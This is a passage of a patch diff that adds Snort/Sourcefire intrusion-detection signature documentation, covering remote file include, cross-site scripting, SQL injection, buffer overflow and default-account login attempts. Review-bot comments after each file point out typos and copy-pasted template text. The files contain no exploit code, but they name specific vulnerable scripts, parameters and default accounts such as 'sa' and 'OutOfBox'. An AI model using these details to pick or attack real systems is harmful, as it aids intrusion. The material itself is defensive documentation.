+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "lang_activity.php" script used by the "phpBB-Amod" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpBB-Amod
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
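Review bot: the two empty lines before "Rule:" at the top of this hunk are inconsistent with the other documents; "ona web server" should be "on a web server"; and the third Detailed Information paragraph plus the Attack Scenarios text repeat the generic CGI authentication template instead of describing the remote file include via "phpbb_root_path" in "lang_activity.php", which is what the rule detects.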
--- /dev/null
+++ b/doc/signatures/100000784.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000784
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "current_cat" parameter in the "create_course.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
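Review bot: the Impact section ("system integrity compromise ... execution of arbitrary code of the attackers choosing") and the second paragraph of Detailed Information ("execute system binaries") are copied from the remote file include template and overstate a cross site scripting issue; the Attack Scenarios line in this hunk already gives the right picture (a malicious link that steals information from the user who clicks it), so Impact should describe client-side effects such as session or credential theft. Also the blank line before "--" is missing after the Sid, Affected Systems and Contributors sections, and "attackers" needs an apostrophe.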
--- /dev/null
+++ b/doc/signatures/3152.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid:
+3152
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access a host running
+Microsoft SQL Server or utilizing MSDE via the default "sa" account.
+
+-- 
+Impact: 
+Information disclosure. Unauthorized access to the host.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access a host via the
+"sa" account using brute force techniques to guess a password.
+
+Microsoft SQL server and MSDE components use a default "sa" account with
+a default password as the administrative user for the database
+installation. This event indicates that numerous failed attempts have
+been made to access the target host using this account.
+
+--
+Affected Systems:
+	Microsoft SQL Server 2000
+	Microsoft SQL Server 7.0
+	Systems using Microsoft MSDE components
+
+--
+Attack Scenarios:  
+An attacker can use an automated script to gain access to a host and the
+database contents as an administrator by repeatly attempting to login
+using the "sa" account and different passwords.
+
+Some worms also try to brute force entry using this methodology.
+
+-- 
+Ease of Attack: 
+Simple,
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches
+
+Change the default "sa" password
+
+Disable the "sa" account.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
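Review bot: "Simple," under Ease of Attack ends with a comma instead of a period, "repeatly" in Attack Scenarios should be "repeatedly", and "Microsoft SQL server" should be "Microsoft SQL Server" as in the Summary. The Corrective Action items lack periods; since the documented trigger is "numerous failed attempts", account lockout or connection rate limiting would be a useful addition alongside changing the default "sa" password.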
--- /dev/null
+++ b/doc/signatures/2716.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2716
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure end_load
+. This procedure is included in
+dbms_offline_snapshot.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
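Review bot: Detailed Information in this hunk breaks the sentence before its period, leaving a line that starts ". This procedure is included in" after "vulnerability in the procedure end_load"; this reads like an unfilled template and should be joined into "...the procedure end_load. This procedure is included in dbms_offline_snapshot." "Oracle Oracle9i" under Affected Systems repeats the vendor name, and the Additional References section is empty.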
--- /dev/null
+++ b/doc/signatures/2727.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2727
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_nvarchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
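Review bot: the same line-break artifact as in the other Oracle documents: "vulnerability in the procedure add_priority_nvarchar2" is followed by a line beginning ". This procedure is included in"; join the sentence so it reads "...add_priority_nvarchar2. This procedure is included in dbms_repcat." Also "Oracle Oracle9i" repeats the vendor name and Additional References is empty.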
--- /dev/null
+++ b/doc/signatures/2741.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2741
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
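Review bot: "vulnerability in the procedure alter_priority" is followed by a line beginning ". This procedure is included in", the same template artifact as in 2716.txt and 2727.txt; join it into one sentence ending "...alter_priority. This procedure is included in dbms_repcat." "Oracle Oracle9i" under Affected Systems repeats the vendor name, and the Additional References section is empty.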
--- /dev/null
+++ b/doc/signatures/3163.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3163
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
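Review bot: this is the fourth copy of the RPC DCOM document in this patch (with 3211, 3359 and 3404), differing only in the Sid, and it inherits the same problems: Attack Scenarios ("overly long filename via a network share") does not match the malformed RPC request described in Detailed Information, and "Expoit" under Ease of Attack is misspelled; fix the shared text in every copy.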
--- /dev/null
+++ b/doc/signatures/2245.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2245
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known vulnerability in NetWin WebNEWS.
+
+--
+Impact:
+Execution of arbitrary code. Possible unauthorized access to the target 
+host.
+
+--
+Detailed Information:
+WebNEWS allows access to news groups via a web interface. Certain 
+versions of the application suffer from a buffer overflow condition such
+that a user supplied group name longer than 1500 characters may allow 
+the attacker to execute code of his choosing with the privileges of the 
+user running the web server.
+
+--
+Affected Systems:
+	NetWin WebNEWS 1.1 j
+	NetWin WebNEWS 1.1 i
+	NetWin WebNEWS 1.1 h
+
+--
+Attack Scenarios:
+The attacker would need to supply a long news group name of over 1500 
+characters to cause the overflow which may then present the attacker 
+with the opportunity to execute code.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
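Review bot: Additional References is empty even though Detailed Information and Affected Systems pin this to a specific overflow (a group name longer than 1500 characters) in WebNEWS 1.1h through 1.1j; add the advisory that identifies the issue so the 1500-character threshold can be checked against the rule. Minor wording: "execute code of his choosing" should be "code of their choosing", matching the other files in the series.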
--- /dev/null
+++ b/doc/signatures/710.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+710
+
+--
+Summary:
+This event is generated after an attempted login to a telnet server 
+using the username OutOfBox.
+
+--
+Impact:
+Unauthorized remote access.
+
+--
+Detailed Information:
+Some SGI machines are shipped with an easy setup group of scripts to
+assist the user when setting up the host. This group of programs is
+called EZsetup and may install some passwordless default accounts on the 
+machine.
+
+This event is generated when an attempt is made to login to a server
+using the username OutOfBox via Telnet. This is a default account on some
+SGI based machines. The password may also be OutOfBox or it may not have
+a password assigned.
+
+Repeated events from this rule may indicate a determined effort to guess
+the password for this account.
+
+--
+Affected Systems:
+	SGI Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to connect to a telnet server using the username
+OutOfBox.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the OutOfBox account.
+
+Choose the most secure options when using EZsetup.
+
+Use ssh as an alternative to Telnet
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
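Review bot: False Positives says "None known." but the rule fires on any Telnet login with the username OutOfBox, and Detailed Information itself explains this is a default account on some SGI systems, so legitimate use of that account before it is disabled will generate the same event; say so and recommend confirming against the host's login records. Also "Use ssh as an alternative to Telnet" is missing its full stop, and "SGI based machines" should be "SGI-based machines".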
--- /dev/null
+++ b/doc/signatures/273.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+273
+
+--
+Summary:
+This event is generated when a remote attacker transmits fragmented IGMP packets with malformed headers to the internal network, indicating an IGMP Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+If an IGMP packet with a malformed header is transmitted to an unpatched Microsoft Windows computer, the computer may crash when it attempts to process the packet.  
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98 SE
+Microsoft Windows NT 4
+
+--
+Attack Scenarios:
+An attacker sends fragmented IGMP packets with malformed headers to a target computer. If the computer is running an unpatched version of Windows, it may crash.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the latest patches available for your operating system. See http://www.microsoft.com/technet/security/bulletin/ms99-034.asp for more information.
+
+Implement a packet-filtering firewall to block inappropriate traffic to the network.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/514
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms99-034.asp
+
+--
--- /dev/null
+++ b/doc/signatures/389.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+
+Sid:
+389
+
+--
+
+Summary:
+This event is generated when an ICMP Address Mask Request message is found on the network with an invalid ICMP Code.  ICMP Address Mask Requests are used for automatically determining the 32-bit subnet mask for the network.  RFC 950 definesthe Code for ICMP Type 17 datagram to be 0, if this field is not 0 it could be an indication of an attack attempt.
+
+--
+
+Impact:
+Attacks may use an ICMP address Mask Request to determine the subnet mask of the network.  This information can be used to help develope a network diagram in lue of more focused attacks.
+--
+
+Detailed Information:
+ICMP Address Mask Requests are defined in RFC 950 as the third method hosts may support for determing the address mask correspoding to its IP address.  In most implementations this method is not supported, and should not be normal traffic on most networks.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the subnet masks of a given network subnet.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Address Mask Requests.
+--
+
+False Positives:
+None known.  ICMP Type 17 datagrams should never be generated with a code other than 0.
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 17 should be blocked at the upstream firewall.  This type of ICMP request should never originate from a host outside of the protected network.
+--
+
+Contributors:
+Original Rule wirter unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
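Review bot: this file is missing the Affected Systems section that every other signature file carries between Detailed Information and Attack Scenarios; add it. The Summary and False Positives make clear the rule triggers on a Type 17 datagram whose Code is not 0, but Impact and Attack Scenarios describe ordinary address-mask reconnaissance; rephrase those two sections around the non-zero Code so all sections describe the same event. Spelling: "definesthe", "develope", "in lue of", "determing", "correspoding", "wirter", and "Attacks may use" should be "Attackers may use".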
--- /dev/null
+++ b/doc/signatures/100000680.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000680
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "search.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "search.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
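Review bot: the third paragraph of Detailed Information and the Attack Scenarios entry are generic CGI authentication-bypass text ("An attacker can access an authentication mechanism and supply his/her own credentials") and do not describe a remote file include; replace them with the scenario the Summary documents, a request to search.php with an attacker-controlled URL in the header_prog parameter so the server includes and executes remotely hosted code. Also "ona web server" should be "on a web server", and "an exploitation attempt has been attempted" should be "an exploitation attempt has been made".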
--- /dev/null
+++ b/doc/signatures/2324.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2324
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Virtual Programming VP-ASP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Virtual Programming VP-ASP web application running on a
+server. It may be possible to use SQL injection techniques to supply
+SQL code of an attackers choosing to the database used in the
+application.
+
+--
+Affected Systems:
+	Virtual Programming VP-ASP 4.0
+	Virtual Programming VP-ASP 5.0
+
+--
+Attack Scenarios:
+An attacker can inject SQL code of their choosing to view and manipulate
+data stored in the underlying database used by the application.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
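Review bot: neither Summary nor Detailed Information identifies the VP-ASP script or parameter the rule matches, so an analyst cannot tell what request produced the event or validate it; name the vulnerable page and the injected parameter, and add the corresponding advisory under the empty Additional References. Minor: "attackers choosing" should be "attacker's choosing".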
--- /dev/null
+++ b/doc/signatures/2574.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2574
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an FTP server during authentication.
+
+--
+
+Impact:
+Attempted Admin.  A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the FTP daemon.
+
+--
+
+Detailed Information:
+Several FTP daemons are vulnerable to format string exploits during
+authentication to the FTP server.  A successful exploit attempt could 
+result in the remote attacker gaining unauthorized root access to the 
+vulnerable system.
+
+--
+Affected Systems:
+	BolinTech Dream FTP Server version 1.02
+
+--
+
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Numerous attack scripts exist to exploit this vulnerabiliy.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+
+--
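Review bot: Impact and Detailed Information disagree on privileges: Impact says code runs "with the same privileges as the user running the FTP daemon" while Detailed Information says the attacker gains "unauthorized root access"; pick one, and the daemon's privileges is the defensible statement. Detailed Information also says "Several FTP daemons are vulnerable" while Affected Systems lists only BolinTech Dream FTP Server 1.02; either list the others or narrow the sentence. "Attempted Admin." is a classtype label rather than an impact statement and should be dropped from the prose. Typos: "an gain" should be "and gain", "vulnerabiliy" should be "vulnerability". Additional References is empty.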
--- /dev/null
+++ b/doc/signatures/100000366.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000366
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_ug_auth.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_ug_auth.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
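Review bot: Attack Scenarios and the third paragraph of Detailed Information describe credential bypass of a CGI authentication mechanism, which is not the remote file include the Summary documents; describe the actual scenario, a request to admin_ug_auth.php carrying an attacker-controlled URL in the phpbb_root_path parameter. Also "ona web server" should be "on a web server", and "an exploitation attempt has been attempted" should be "an exploitation attempt has been made".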
--- /dev/null
+++ b/doc/signatures/100000699.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000699
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Vincent Leclercq News" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "id" parameter in the "diver.php" script used by the "Vincent Leclercq News" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Vincent Leclercq News
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
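Review bot: Impact claims "system integrity compromise", "administrative access to the server" and "execution of arbitrary code", and Detailed Information adds "execute system binaries", but the flaw documented is cross-site scripting in the id parameter of diver.php; script delivered through XSS runs in the victim's browser, not on the server. Reword Impact to credential or session theft and actions taken in the context of the user who follows the link, consistent with the Attack Scenarios entry ("a malicious link designed to steal information").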
--- /dev/null
+++ b/doc/signatures/100000683.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000683
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "cPanel" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "file" parameter in the "select.html" script 
+used by the "cPanel" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using cPanel
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
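Review bot: Impact and the second paragraph of Detailed Information ("retrieve sensitive data, execute system binaries or malicious code") overstate a cross-site scripting flaw in the file parameter of select.html; XSS executes in the browser of the user who follows the link, so server-side code execution and administrative access to the server are not supported by anything else in the file. Align Impact with the Attack Scenarios entry, which correctly describes information theft from a user clicking a crafted link.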
--- /dev/null
+++ b/doc/signatures/1522.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1522
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
